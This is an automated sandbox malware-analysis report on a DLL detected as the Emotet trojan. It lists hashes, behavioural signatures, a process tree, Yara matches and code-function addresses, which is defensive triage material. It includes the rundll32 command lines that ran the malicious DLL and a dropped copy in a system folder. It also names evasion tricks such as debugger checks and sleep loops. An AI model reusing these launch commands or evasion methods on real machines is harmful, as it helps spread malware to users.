Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3pO1282Kpx.dll

Overview

General Information

Sample Name:3pO1282Kpx.dll
Analysis ID:532438
MD5:173345845a2a7d0d99c17bdc5445df90
SHA1:35ed97b5ac5a3ed0fdc00eabff20f3bfcdfc8a7c
SHA256:9ed58848f0a7b354a32d4ef67ea9ff70ba75f9238c39d9f1af88fae6811cb504
Tags:32dllexetrojan
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries disk information (often used to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6544 cmdline: loaddll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 4652 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6256 cmdline: rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6040 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6088 cmdline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5280 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Tbiyedppjzsf\xswipktkmrv.drt",WgszfYRBINQe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4532 cmdline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,ajkaibu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 4112 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6612 cmdline: rundll32.exe C:\Users\user\Desktop\3pO1282Kpx.dll,akyncbgollmj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 1508 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\3pO1282Kpx.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 3520 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 324 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 3424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 332 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6920 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7160 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 6936 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6544 -ip 6544 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6800 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 6544 -ip 6544 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1040 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6264 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000001.00000000.638369835.000000000131B000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000001.00000000.638310393.0000000001210000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000001.00000000.638310393.0000000001210000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 23 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.rundll32.exe.2e221e0.1.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              7.2.rundll32.exe.2e221e0.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                1.0.loaddll32.exe.1210000.3.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  1.0.loaddll32.exe.1210000.3.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    1.2.loaddll32.exe.1333540.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 63 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 3pO1282Kpx.dllVirustotal: Detection: 23%Perma Link
                      Source: 3pO1282Kpx.dllReversingLabs: Detection: 18%
                      Source: 3pO1282Kpx.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: 3pO1282Kpx.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.650010447.0000000004329000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.666367575.0000000000A2C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.666826708.0000000000A2C000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: a4pjr7pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000013.00000002.659568546.00000000004A2000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.652692590.0000000004BB1000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.671414191.0000000004A51000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.666367575.0000000000A2C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.666826708.0000000000A2C000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F250AA5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_6F250AA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F250AA5 FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_6F250AA5
                      Source: svchost.exe, 0000000A.00000002.744676034.0000020495E61000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.689793778.00000000047AB000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.689756060.000000000479B000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.692147175.00000000047AC000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000000A.00000002.744484037.0000020495E12000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000000A.00000002.742753085.00000204906AF000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlso
                      Source: Amcache.hve.19.drString found in binary or memory: http://upx.sf.net
                      Source: WerFault.exe, 00000016.00000003.689793778.00000000047AB000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.689756060.000000000479B000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000002.692147175.00000000047AC000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 7.2.rundll32.exe.2e221e0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.1333540.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.3200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.713568.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.650000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.713568.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.2e221e0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.b90000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.650000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.1210000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.1333540.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3303590.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.1210000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.b90000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1210000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.3303590.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.1333540.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.638369835.000000000131B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.638310393.0000000001210000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.634927199.0000000002E0A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.636690720.00000000032EA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.662291713.0000000001210000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.663123528.0000000001210000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.638357953.0000000000650000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.637148475.0000000003200000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.693214956.000000000131B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.597595639.0000000003259000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.641147134.000000000131B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.638392292.00000000006FA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.663179674.000000000131B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.662403503.000000000131B000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.634790004.0000000000B90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.636271952.0000000003100000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.640836289.0000000001210000.00000040.00000010.sdmp, type: MEMORY
                      Source: 3pO1282Kpx.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6544 -ip 6544
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Tbiyedppjzsf\xswipktkmrv.drt:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Tbiyedppjzsf\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012312911_2_01231291
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012291241_2_01229124
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121A92F1_2_0121A92F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122CD351_2_0122CD35
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121F73B1_2_0121F73B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122970A1_2_0122970A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122E10A1_2_0122E10A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122590E1_2_0122590E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01223D0C1_2_01223D0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122BF0C1_2_0122BF0C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121CB131_2_0121CB13
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01214D1E1_2_01214D1E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121BD611_2_0121BD61
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121CF6E1_2_0121CF6E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012303701_2_01230370
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012265401_2_01226540
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012289A21_2_012289A2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122E5A71_2_0122E5A7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01220BA41_2_01220BA4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122DDA51_2_0122DDA5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122E3B51_2_0122E3B5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012285B81_2_012285B8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122D7BE1_2_0122D7BE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012159BF1_2_012159BF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012143BE1_2_012143BE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01214B811_2_01214B81
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012237821_2_01223782
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01218D801_2_01218D80
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122DB871_2_0122DB87
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121358B1_2_0121358B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121B1911_2_0121B191
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012215911_2_01221591
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012177951_2_01217795
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121A3E71_2_0121A3E7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012151EC1_2_012151EC
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122EDED1_2_0122EDED
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012119C01_2_012119C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012175D21_2_012175D2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012198241_2_01219824
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012132281_2_01213228
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122282D1_2_0122282D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012134321_2_01213432
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121243F1_2_0121243F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122C2051_2_0122C205
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121800A1_2_0121800A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0123261E1_2_0123261E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121B4641_2_0121B464
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012168691_2_01216869
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01213A6C1_2_01213A6C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122B6771_2_0122B677
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121FA781_2_0121FA78
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121387F1_2_0121387F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012230431_2_01223043
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121AE431_2_0121AE43
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012274451_2_01227445
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121544C1_2_0121544C
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121AA4E1_2_0121AA4E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012164531_2_01216453
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122EA551_2_0122EA55
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121CE5A1_2_0121CE5A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121A0831_2_0121A083
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121F48A1_2_0121F48A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01220A931_2_01220A93
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122CE901_2_0122CE90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01220E971_2_01220E97
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122009A1_2_0122009A
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122A29B1_2_0122A29B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0122E8991_2_0122E899
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121FE9D1_2_0121FE9D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012140E21_2_012140E2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121F0E91_2_0121F0E9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0121C0EA1_2_0121C0EA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012256E91_2_012256E9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012184F01_2_012184F0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012262F51_2_012262F5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01224CF51_2_01224CF5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01211EFB1_2_01211EFB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012146FA1_2_012146FA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012240FE1_2_012240FE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012192C11_2_012192C1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01212CC21_2_01212CC2
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012320CE1_2_012320CE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012210CD1_2_012210CD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012252D11_2_012252D1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012190D41_2_012190D4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_012228D51_2_012228D5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_01231CDB1_2_01231CDB
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F239F101_2_6F239F10
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F2377B41_2_6F2377B4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F23D5301_2_6F23D530
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F231DE01_2_6F231DE0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F24E3A11_2_6F24E3A1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F2403801_2_6F240380
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F233A901_2_6F233A90
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F2360701_2_6F236070
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F2368B01_2_6F2368B0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F23A8901_2_6F23A890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F23E8901_2_6F23E890
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6F2410C01_2_6F2410C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F239F104_2_6F239F10
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F2377B44_2_6F2377B4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F23D5304_2_6F23D530
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F231DE04_2_6F231DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F24E3A14_2_6F24E3A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F2403804_2_6F240380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F233A904_2_6F233A90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F2360704_2_6F236070
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F2368B04_2_6F2368B0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F23A8904_2_6F23A890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F23E8904_2_6F23E890
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_6F2410C04_2_6F2410C0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BB12917_2_00BB1291
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BAEA557_2_00BAEA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA009A7_2_00BA009A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BAA29B7_2_00BAA29B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BAE8997_2_00BAE899
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9FE9D7_2_00B9FE9D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA0A937_2_00BA0A93
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BACE907_2_00BACE90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA0E977_2_00BA0E97
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9F48A7_2_00B9F48A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9A0837_2_00B9A083
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B91EFB7_2_00B91EFB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B946FA7_2_00B946FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA40FE7_2_00BA40FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B984F07_2_00B984F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA62F57_2_00BA62F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA4CF57_2_00BA4CF5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9F0E97_2_00B9F0E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00B9C0EA7_2_00B9C0EA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00BA56E97_2_00BA56E9
